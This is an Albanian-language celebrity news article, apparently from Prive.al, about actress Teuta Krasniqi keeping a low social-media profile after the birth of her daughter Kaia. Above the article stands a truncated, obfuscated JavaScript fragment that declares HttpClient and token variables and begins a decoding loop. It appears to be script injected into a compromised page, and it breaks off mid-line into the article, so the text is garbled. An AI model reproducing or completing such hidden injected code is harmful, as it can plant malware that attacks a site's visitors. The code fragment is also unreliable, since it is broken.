;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nga çka po ruhet Teuta Krasniqi?!

By

Në një periudhë të lumturisë së brendshme, viteve të fundit ajo që pason është reflektimi i kësaj gjendjeje në rrjete sociale, platformat me prioritet për shumëkë.

Por duket se kjo nuk po vlen për aktoren Teuta Krasniqi e cila me përvojën prapa, po tregohet shumë e rezervuar në rrjete sociale pas zhvillimit të fundit – ardhjes në jetë të princeshës Kaia.

Përtej pritshmërive, Teuta këtë periudhë e ka mbajtur në privatësi për faktin se nga lindja e vajzës rreth tre javë më parë, në rrjete sociale ka postuar vetëm dy fotografi duke u pasivizuar mjaft në profilet e saj.

Mbase duke dashur të ruhet nga syri i publikut, aktorja e zgjedhur si më e mira në Kosovë për vitin 2015 ka bërë hapin e duhur, përkundër faktit se kjo mund të mos i pëlqejë pak fansave të shumtë që janë kuriozë për detaje më të hollësishme.

Me fokusin aktual tek familja dhe vetja, mbetet të shihet me kohën se sa gjatë aktorja planifikon të vazhdojë në këtë formë duke pauzuar nga jeta publike dhe impenjimet e shumta në karrierë. /Prive.al

Artikuj të ngjashëm